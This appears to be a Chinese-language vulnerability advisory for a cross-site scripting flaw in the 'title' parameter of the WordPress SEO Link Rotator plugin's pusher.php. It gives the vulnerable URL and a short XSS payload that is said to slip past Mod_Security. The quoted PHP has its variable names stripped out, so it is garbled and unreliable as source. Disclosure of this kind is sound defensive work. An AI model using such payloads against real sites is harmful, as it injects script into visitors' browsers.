Wordpress Seo Link Rotator...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 漏洞详情 漏洞标题 : Wordpress Seo Link Rotator 插件-pusher.php文件title参数--跨站脚本漏洞 插件首页 : http://www.seolinkrotator.com 下载链接 : http://www.seolinkrotator.com/download/files/seolinkrotator.zip 存在跨站漏洞的文件为pusher.php ,未做输入输出转义过滤: ``` <?php = ['action']; switch(){ case "buildLink": = ['URL']; = urldecode(['title']); = ['type']; ?> <div class="seoLinkRotatorInfo"> <h2>Link To This <?=ucwords()?></h2> <p>If you would like to share this <?=?> with someone else just copy and paste the HTML into one of your pages:</p> <div class="seoLinkHTMLBox"> <?php echo '&lt;a href="' . . '"&gt;' . . '&lt;a&gt;'; ?> </div> </div> <?php break; default: echo 'Unkown action'; break; } ?> ``` 漏洞位置 : ``` localhost/wp-content/plugins/seolinkrotator/pusher.php?action=buildLink&title=[Xss] ``` 漏洞证明: 为绕过一些版本Apache的Mod_Security安全配置,使用以下作为payload ``` "/><img src=x onerror=prompt(1131)> ``` 网站返回200,返回页面如下: ![](https://images.seebug.org/contribute/e5dbacd0-1321-42c1-ad17-07c46b2736de)

0%
暂无可用Exp或PoC
当前有0条受影响产品信息